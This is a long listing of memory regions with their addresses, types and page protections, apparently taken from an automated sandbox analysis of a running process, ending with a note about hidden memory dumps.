||
|
2B9569E0000
|
heap
|
page read and write
|
||
|
2B956731000
|
heap
|
page read and write
|
||
|
2B9549AF000
|
heap
|
page read and write
|
||
|
14F8000
|
heap
|
page read and write
|
||
|
2B956830000
|
remote allocation
|
page read and write
|
||
|
2B9570EF000
|
heap
|
page read and write
|
||
|
2B954A21000
|
heap
|
page read and write
|
||
|
14D7000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D27330000
|
trusted library allocation
|
page read and write
|
||
|
20D27406000
|
heap
|
page read and write
|
||
|
2B957100000
|
heap
|
page read and write
|
||
|
7FF848BF0000
|
trusted library allocation
|
page read and write
|
||
|
2B9549E8000
|
heap
|
page read and write
|
||
|
2B9570EF000
|
heap
|
page read and write
|
||
|
6F30000
|
trusted library allocation
|
page execute and read and write
|
||
|
56D0000
|
heap
|
page read and write
|
||
|
2B957110000
|
heap
|
page read and write
|
||
|
6BFE000
|
stack
|
page read and write
|
||
|
2B956AC0000
|
heap
|
page read and write
|
||
|
2B95709D000
|
heap
|
page read and write
|
||
|
3230000
|
heap
|
page read and write
|
||
|
2B956722000
|
heap
|
page read and write
|
||
|
151C0FE000
|
stack
|
page read and write
|
||
|
2B9570F8000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
FF2CDFE000
|
stack
|
page read and write
|
||
|
FF2C505000
|
stack
|
page read and write
|
||
|
7FF848EF0000
|
trusted library allocation
|
page read and write
|
||
|
20D279CE000
|
trusted library allocation
|
page read and write
|
||
|
151C07E000
|
stack
|
page read and write
|
||
|
2B9572FE000
|
heap
|
page read and write
|
||
|
15B2000
|
heap
|
page read and write
|
||
|
2B95709F000
|
heap
|
page read and write
|
||
|
7349C7E000
|
stack
|
page read and write
|
||
|
2B954A3F000
|
heap
|
page read and write
|
||
|
14C0000
|
trusted library allocation
|
page read and write
|
||
|
15D1000
|
heap
|
page read and write
|
||
|
14D2000
|
trusted library allocation
|
page read and write
|
||
|
151BEF7000
|
stack
|
page read and write
|
||
|
2B9549F9000
|
heap
|
page read and write
|
||
|
2B9549C4000
|
heap
|
page read and write
|
||
|
20D27A8C000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E40000
|
trusted library allocation
|
page read and write
|
||
|
2B956370000
|
heap
|
page read and write
|
||
|
20D3FA03000
|
heap
|
page read and write
|
||
|
5CF0000
|
trusted library allocation
|
page read and write
|
||
|
569A000
|
trusted library allocation
|
page read and write
|
||
|
2B954A3E000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
2B957411000
|
heap
|
page read and write
|
||
|
2B956880000
|
heap
|
page read and write
|
||
|
151B000
|
heap
|
page read and write
|
||
|
2B954A43000
|
heap
|
page read and write
|
||
|
FF2D3FB000
|
stack
|
page read and write
|
||
|
2B9570C7000
|
heap
|
page read and write
|
||
|
67FE000
|
stack
|
page read and write
|
||
|
20D27CCE000
|
trusted library allocation
|
page read and write
|
||
|
2B954C25000
|
heap
|
page read and write
|
||
|
14286286000
|
trusted library allocation
|
page read and write
|
||
|
2B9568A0000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
7FF848C96000
|
trusted library allocation
|
page read and write
|
||
|
151BCFE000
|
stack
|
page read and write
|
||
|
2B956751000
|
heap
|
page read and write
|
||
|
2B95741D000
|
heap
|
page read and write
|
||
|
20D27A3A000
|
trusted library allocation
|
page read and write
|
||
|
66D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B95671A000
|
heap
|
page read and write
|
||
|
2B9573BA000
|
heap
|
page read and write
|
||
|
7FF848DB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6810000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EB0000
|
trusted library allocation
|
page read and write
|
||
|
2B956756000
|
heap
|
page read and write
|
||
|
2B956754000
|
heap
|
page read and write
|
||
|
42A4000
|
trusted library allocation
|
page read and write
|
||
|
2B956830000
|
remote allocation
|
page read and write
|
||
|
20D3FBD0000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
2B956712000
|
heap
|
page read and write
|
||
|
2B9572FF000
|
heap
|
page read and write
|
||
|
2B9568A5000
|
heap
|
page read and write
|
||
|
142901D7000
|
trusted library allocation
|
page read and write
|
||
|
2B95730B000
|
heap
|
page read and write
|
||
|
2B95737B000
|
heap
|
page read and write
|
||
|
1460000
|
heap
|
page read and write
|
||
|
2B95721C000
|
heap
|
page read and write
|
||
|
2B954978000
|
heap
|
page read and write
|
||
|
20D27A85000
|
trusted library allocation
|
page read and write
|
||
|
2B9573FF000
|
heap
|
page read and write
|
||
|
573C000
|
stack
|
page read and write
|
||
|
2B95709F000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
20D27DAE000
|
trusted library allocation
|
page read and write
|
||
|
2B954850000
|
heap
|
page read and write
|
||
|
2B957409000
|
heap
|
page read and write
|
||
|
2B9573FF000
|
heap
|
page read and write
|
||
|
FF2C9FE000
|
stack
|
page read and write
|
||
|
2B9572D7000
|
heap
|
page read and write
|
||
|
FEF70000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D25946000
|
heap
|
page read and write
|
||
|
5AAE000
|
stack
|
page read and write
|
||
|
20D27A40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DC2000
|
trusted library allocation
|
page read and write
|
||
|
14283F55000
|
trusted library allocation
|
page read and write
|
||
|
142902F6000
|
trusted library allocation
|
page read and write
|
||
|
6D10000
|
trusted library allocation
|
page read and write
|
||
|
20D27400000
|
heap
|
page read and write
|
||
|
6FE0000
|
heap
|
page read and write
|
||
|
20D3FA00000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BED000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D25958000
|
heap
|
page read and write
|
||
|
2B956753000
|
heap
|
page read and write
|
||
|
FF2D1FA000
|
stack
|
page read and write
|
||
|
2B957211000
|
heap
|
page read and write
|
||
|
7FF848CC6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
6D00000
|
trusted library allocation
|
page read and write
|
||
|
568B000
|
trusted library allocation
|
page read and write
|
||
|
20D3FDF0000
|
heap
|
page read and write
|
||
|
2B956711000
|
heap
|
page read and write
|
||
|
2B9570FD000
|
heap
|
page read and write
|
||
|
66C0000
|
trusted library allocation
|
page read and write
|
||
|
2B956726000
|
heap
|
page read and write
|
||
|
1453000
|
trusted library allocation
|
page execute and read and write
|
||
|
734A17E000
|
stack
|
page read and write
|
||
|
1428007E000
|
trusted library allocation
|
page read and write
|
||
|
2B954A34000
|
heap
|
page read and write
|
||
|
5686000
|
trusted library allocation
|
page read and write
|
||
|
2B957252000
|
heap
|
page read and write
|
||
|
56A6000
|
trusted library allocation
|
page read and write
|
||
|
14285D94000
|
trusted library allocation
|
page read and write
|
||
|
5AEE000
|
stack
|
page read and write
|
||
|
151BE79000
|
stack
|
page read and write
|
||
|
14280223000
|
trusted library allocation
|
page read and write
|
||
|
2B957420000
|
heap
|
page read and write
|
||
|
16F0000
|
trusted library allocation
|
page read and write
|
||
|
14290010000
|
trusted library allocation
|
page read and write
|
||
|
173E000
|
stack
|
page read and write
|
||
|
1525000
|
heap
|
page read and write
|
||
|
14290001000
|
trusted library allocation
|
page read and write
|
||
|
56C0000
|
trusted library allocation
|
page read and write
|
||
|
3210000
|
trusted library allocation
|
page read and write
|
||
|
14286DFC000
|
trusted library allocation
|
page read and write
|
||
|
5D00000
|
heap
|
page read and write
|
||
|
20D3798D000
|
trusted library allocation
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
2B954A37000
|
heap
|
page read and write
|
||
|
14DB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B954A21000
|
heap
|
page read and write
|
||
|
2B954A32000
|
heap
|
page read and write
|
||
|
2B95722B000
|
heap
|
page read and write
|
||
|
20D272D0000
|
heap
|
page read and write
|
||
|
2B9549A3000
|
heap
|
page read and write
|
||
|
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
|
56A1000
|
trusted library allocation
|
page read and write
|
||
|
2B9572FE000
|
heap
|
page read and write
|
||
|
151BDFE000
|
stack
|
page read and write
|
||
|
7FF848D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B95673A000
|
heap
|
page read and write
|
||
|
7FF848D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
5BEE000
|
stack
|
page read and write
|
||
|
2B9549FB000
|
heap
|
page read and write
|
||
|
156C000
|
heap
|
page read and write
|
||
|
2B956716000
|
heap
|
page read and write
|
||
|
2B9572A8000
|
heap
|
page read and write
|
||
|
151BF7C000
|
stack
|
page read and write
|
||
|
7FF848BE2000
|
trusted library allocation
|
page read and write
|
||
|
595C000
|
stack
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
2B956755000
|
heap
|
page read and write
|
||
|
7FF848D91000
|
trusted library allocation
|
page read and write
|
||
|
2B954A2F000
|
heap
|
page read and write
|
||
|
151BAFE000
|
stack
|
page read and write
|
||
|
7FF848D9A000
|
trusted library allocation
|
page read and write
|
||
|
2B954A21000
|
heap
|
page read and write
|
||
|
2B95671D000
|
heap
|
page read and write
|
||
|
20D3F986000
|
heap
|
page read and write
|
||
|
2B956753000
|
heap
|
page read and write
|
||
|
56B2000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
|
4269000
|
trusted library allocation
|
page read and write
|
||
|
2B9549A3000
|
heap
|
page read and write
|
||
|
2B9570C7000
|
heap
|
page read and write
|
||
|
20D25938000
|
heap
|
page read and write
|
||
|
7349E7F000
|
stack
|
page read and write
|
||
|
7349D7E000
|
stack
|
page read and write
|
||
|
1584000
|
heap
|
page read and write
|
||
|
20D27ED4000
|
trusted library allocation
|
page read and write
|
||
|
14285355000
|
trusted library allocation
|
page read and write
|
||
|
73497A3000
|
stack
|
page read and write
|
||
|
67BE000
|
stack
|
page read and write
|
||
|
3296000
|
trusted library allocation
|
page read and write
|
||
|
20D27EC7000
|
trusted library allocation
|
page read and write
|
||
|
20D2593C000
|
heap
|
page read and write
|
||
|
6D20000
|
trusted library allocation
|
page read and write
|
||
|
2B956C10000
|
trusted library allocation
|
page read and write
|
||
|
2B956747000
|
heap
|
page read and write
|
||
|
20D25920000
|
heap
|
page read and write
|
||
|
2B95498E000
|
heap
|
page read and write
|
||
|
2B9572FE000
|
heap
|
page read and write
|
||
|
2B956715000
|
heap
|
page read and write
|
||
|
2B9549EC000
|
heap
|
page read and write
|
||
|
142835E1000
|
trusted library allocation
|
page read and write
|
||
|
2B9570C7000
|
heap
|
page read and write
|
||
|
FF2C8FE000
|
stack
|
page read and write
|
||
|
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
|
2B954C20000
|
heap
|
page read and write
|
||
|
151BA73000
|
stack
|
page read and write
|
||
|
2B95706C000
|
heap
|
page read and write
|
||
|
2B9549E8000
|
heap
|
page read and write
|
||
|
63BE000
|
stack
|
page read and write
|
||
|
6578000
|
heap
|
page read and write
|
||
|
1440000
|
trusted library allocation
|
page read and write
|
||
|
2B9570E3000
|
heap
|
page read and write
|
||
|
2B956711000
|
heap
|
page read and write
|
||
|
20D3F922000
|
heap
|
page read and write
|
||
|
FF2CFFC000
|
stack
|
page read and write
|
||
|
20D3F932000
|
heap
|
page read and write
|
||
|
32A6000
|
trusted library allocation
|
page read and write
|
||
|
2B95673F000
|
heap
|
page read and write
|
||
|
2B954A4B000
|
heap
|
page read and write
|
||
|
2B9570E7000
|
heap
|
page read and write
|
||
|
142803DD000
|
trusted library allocation
|
page read and write
|
||
|
20D3FAE0000
|
heap
|
page read and write
|
||
|
56E0000
|
trusted library allocation
|
page read and write
|
||
|
2B95675A000
|
heap
|
page read and write
|
||
|
FF2CEFE000
|
stack
|
page read and write
|
||
|
2B95709D000
|
heap
|
page read and write
|
||
|
1429006D000
|
trusted library allocation
|
page read and write
|
||
|
3200000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B957010000
|
heap
|
page read and write
|
||
|
20D27310000
|
trusted library allocation
|
page read and write
|
||
|
66C6000
|
trusted library allocation
|
page read and write
|
||
|
59AE000
|
stack
|
page read and write
|
||
|
2B954A32000
|
heap
|
page read and write
|
||
|
2B957210000
|
heap
|
page read and write
|
||
|
14D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EC0000
|
trusted library allocation
|
page read and write
|
||
|
2B957414000
|
heap
|
page read and write
|
||
|
64DD000
|
heap
|
page read and write
|
||
|
20D3FAC0000
|
heap
|
page read and write
|
||
|
2B95710E000
|
heap
|
page read and write
|
||
|
7349BFC000
|
stack
|
page read and write
|
||
|
3220000
|
trusted library allocation
|
page read and write
|
||
|
2B957073000
|
heap
|
page read and write
|
||
|
2B956750000
|
heap
|
page read and write
|
||
|
6AFF000
|
stack
|
page read and write
|
||
|
20D2793F000
|
trusted library allocation
|
page read and write
|
||
|
2B9570C7000
|
heap
|
page read and write
|
||
|
20D27CCA000
|
trusted library allocation
|
page read and write
|
||
|
2B9570BC000
|
heap
|
page read and write
|
||
|
20D3FA90000
|
heap
|
page execute and read and write
|
||
|
20D2798A000
|
trusted library allocation
|
page read and write
|
||
|
6D07000
|
trusted library allocation
|
page read and write
|
||
|
2B957100000
|
heap
|
page read and write
|
||
|
20D25917000
|
heap
|
page read and write
|
||
|
2B957418000
|
heap
|
page read and write
|
||
|
2B95675C000
|
heap
|
page read and write
|
||
|
2B954A42000
|
heap
|
page read and write
|
||
|
20D25AC0000
|
heap
|
page read and write
|
||
|
3292000
|
trusted library allocation
|
page read and write
|
||
|
20D27971000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
142881E8000
|
trusted library allocation
|
page read and write
|
||
|
2B9549F9000
|
heap
|
page read and write
|
||
|
2B954770000
|
heap
|
page read and write
|
||
|
2B956726000
|
heap
|
page read and write
|
||
|
1465000
|
heap
|
page read and write
|
||
|
20D27A4B000
|
trusted library allocation
|
page read and write
|
||
|
6CFF000
|
stack
|
page read and write
|
||
|
32CB000
|
trusted library allocation
|
page read and write
|
||
|
14BD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B957040000
|
heap
|
page read and write
|
||
|
20D2598B000
|
heap
|
page read and write
|
||
|
2B95673A000
|
heap
|
page read and write
|
||
|
2B9572FE000
|
heap
|
page read and write
|
||
|
20D3F934000
|
heap
|
page read and write
|
||
|
2B954A30000
|
heap
|
page read and write
|
||
|
2B95671C000
|
heap
|
page read and write
|
||
|
671D000
|
stack
|
page read and write
|
||
|
2B9570E3000
|
heap
|
page read and write
|
||
|
151BC7D000
|
stack
|
page read and write
|
||
|
142860E9000
|
trusted library allocation
|
page read and write
|
||
|
2B9549A3000
|
heap
|
page read and write
|
||
|
2B95497F000
|
heap
|
page read and write
|
||
|
20D273D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
|
14D5000
|
trusted library allocation
|
page execute and read and write
|
||
|
142803D9000
|
trusted library allocation
|
page read and write
|
||
|
150F000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page read and write
|
||
|
142817E1000
|
trusted library allocation
|
page read and write
|
||
|
2B954A4B000
|
heap
|
page read and write
|
||
|
2B95709F000
|
heap
|
page read and write
|
||
|
2B957410000
|
heap
|
page read and write
|
||
|
14F0000
|
heap
|
page read and write
|
||
|
20D27A05000
|
trusted library allocation
|
page read and write
|
||
|
142860BE000
|
trusted library allocation
|
page read and write
|
||
|
20D27CDE000
|
trusted library allocation
|
page read and write
|
||
|
734A07E000
|
stack
|
page read and write
|
||
|
2B957229000
|
heap
|
page read and write
|
||
|
2B95705D000
|
heap
|
page read and write
|
||
|
2B9549FB000
|
heap
|
page read and write
|
||
|
2B954870000
|
heap
|
page read and write
|
||
|
2B957066000
|
heap
|
page read and write
|
||
|
7FF848C90000
|
trusted library allocation
|
page read and write
|
||
|
20D27D4B000
|
trusted library allocation
|
page read and write
|
||
|
1780000
|
heap
|
page execute and read and write
|
||
|
2B9549FB000
|
heap
|
page read and write
|
||
|
151BD7E000
|
stack
|
page read and write
|
||
|
15E9000
|
heap
|
page read and write
|
||
|
2B954A46000
|
heap
|
page read and write
|
||
|
1527000
|
heap
|
page read and write
|
||
|
2B9573FF000
|
heap
|
page read and write
|
||
|
20D3F9E4000
|
heap
|
page read and write
|
||
|
2B95709D000
|
heap
|
page read and write
|
||
|
151CC4E000
|
stack
|
page read and write
|
||
|
14B0000
|
trusted library allocation
|
page read and write
|
||
|
2B9549F9000
|
heap
|
page read and write
|
||
|
20D2796F000
|
trusted library allocation
|
page read and write
|
||
|
20D28036000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
|
20D3F942000
|
heap
|
page read and write
|
||
|
56AD000
|
trusted library allocation
|
page read and write
|
||
|
5CFC000
|
trusted library allocation
|
page read and write
|
||
|
20D27A43000
|
trusted library allocation
|
page read and write
|
||
|
569E000
|
trusted library allocation
|
page read and write
|
||
|
20D279BE000
|
trusted library allocation
|
page read and write
|
||
|
7FF848CA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20D27D04000
|
trusted library allocation
|
page read and write
|
||
|
2B956A20000
|
heap
|
page read and write
|
||
|
2B9549AF000
|
heap
|
page read and write
|
||
|
2B956736000
|
heap
|
page read and write
|
||
|
20D27D6D000
|
trusted library allocation
|
page read and write
|
||
|
2B957340000
|
heap
|
page read and write
|
||
|
20D28024000
|
trusted library allocation
|
page read and write
|
||
|
2B954A21000
|
heap
|
page read and write
|
||
|
73497EF000
|
stack
|
page read and write
|
||
|
20D27D8D000
|
trusted library allocation
|
page read and write
|
||
|
F6A000
|
stack
|
page read and write
|
||
|
20D278E7000
|
heap
|
page execute and read and write
|
||
|
14283DCD000
|
trusted library allocation
|
page read and write
|
||
|
142863BB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848BE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
151BFF8000
|
stack
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
2B95709D000
|
heap
|
page read and write
|
||
|
64C0000
|
heap
|
page read and write
|
||
|
20D258E0000
|
heap
|
page read and write
|
||
|
177C000
|
stack
|
page read and write
|
||
|
2B956753000
|
heap
|
page read and write
|
||
|
142821E1000
|
trusted library allocation
|
page read and write
|
||
|
4241000
|
trusted library allocation
|
page read and write
|
||
|
14283CEB000
|
trusted library allocation
|
page read and write
|
||
|
2B956753000
|
heap
|
page read and write
|
||
|
1450000
|
trusted library allocation
|
page read and write
|
||
|
20D27E9E000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
32C7000
|
trusted library allocation
|
page read and write
|
||
|
734A1FC000
|
stack
|
page read and write
|
||
|
14284955000
|
trusted library allocation
|
page read and write
|
||
|
151C17F000
|
stack
|
page read and write
|
||
|
20D27A3D000
|
trusted library allocation
|
page read and write
|
||
|
2B9570EC000
|
heap
|
page read and write
|
||
|
20D27A37000
|
trusted library allocation
|
page read and write
|
||
|
2B95706D000
|
heap
|
page read and write
|
||
|
151C27B000
|
stack
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
151B7CF000
|
stack
|
page read and write
|
||
|
20D273C0000
|
heap
|
page read and write
|
||
|
2B957105000
|
heap
|
page read and write
|
||
|
1790000
|
heap
|
page read and write
|
||
|
20D2597F000
|
heap
|
page read and write
|
||
|
14280DE1000
|
trusted library allocation
|
page read and write
|
||
|
2B954979000
|
heap
|
page read and write
|
||
|
20D25CB0000
|
heap
|
page read and write
|
||
|
2B95709D000
|
heap
|
page read and write
|
||
|
151BBFF000
|
stack
|
page read and write
|
||
|
2B9570E4000
|
heap
|
page read and write
|
||
|
2B956940000
|
heap
|
page read and write
|
||
|
142863F9000
|
trusted library allocation
|
page read and write
|
||
|
2B95497F000
|
heap
|
page read and write
|
||
|
2B957039000
|
heap
|
page read and write
|
||
|
2B9570C7000
|
heap
|
page read and write
|
||
|
14C6000
|
trusted library allocation
|
page execute and read and write
|
||
|
142877FC000
|
trusted library allocation
|
page read and write
|
||
|
14C2000
|
trusted library allocation
|
page read and write
|
||
|
20D25CB5000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E50000
|
trusted library allocation
|
page read and write
|
||
|
5CC8000
|
trusted library allocation
|
page read and write
|
||
|
14CA000
|
trusted library allocation
|
page execute and read and write
|
||
|
313E000
|
stack
|
page read and write
|
||
|
20D27910000
|
heap
|
page execute and read and write
|
||
|
FF2CBFF000
|
stack
|
page read and write
|
||
|
56D3000
|
heap
|
page read and write
|
||
|
2B9572FE000
|
heap
|
page read and write
|
||
|
FE0000
|
heap
|
page read and write
|
||
|
3148000
|
trusted library allocation
|
page read and write
|
||
|
20D3F920000
|
heap
|
page read and write
|
||
|
2B95706D000
|
heap
|
page read and write
|
||
|
2B9570E3000
|
heap
|
page read and write
|
||
|
2B9563C0000
|
heap
|
page read and write
|
||
|
6800000
|
trusted library allocation
|
page execute and read and write
|
||
|
142803E1000
|
trusted library allocation
|
page read and write
|
||
|
142863FC000
|
trusted library allocation
|
page read and write
|
||
|
20D27F1E000
|
trusted library allocation
|
page read and write
|
||
|
FF2D0FF000
|
stack
|
page read and write
|
||
|
2B9570C7000
|
heap
|
page read and write
|
||
|
328C000
|
trusted library allocation
|
page read and write
|
||
|
20D27921000
|
trusted library allocation
|
page read and write
|
||
|
2B954A21000
|
heap
|
page read and write
|
||
|
2B9570E3000
|
heap
|
page read and write
|
||
|
2B956781000
|
heap
|
page read and write
|
||
|
2B95674F000
|
heap
|
page read and write
|
||
|
20D3F984000
|
heap
|
page read and write
|
||
|
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
|
2B956710000
|
heap
|
page read and write
|
||
|
2B954959000
|
heap
|
page read and write
|
||
|
14285D55000
|
trusted library allocation
|
page read and write
|
There are 499 hidden memdumps, click here to show them.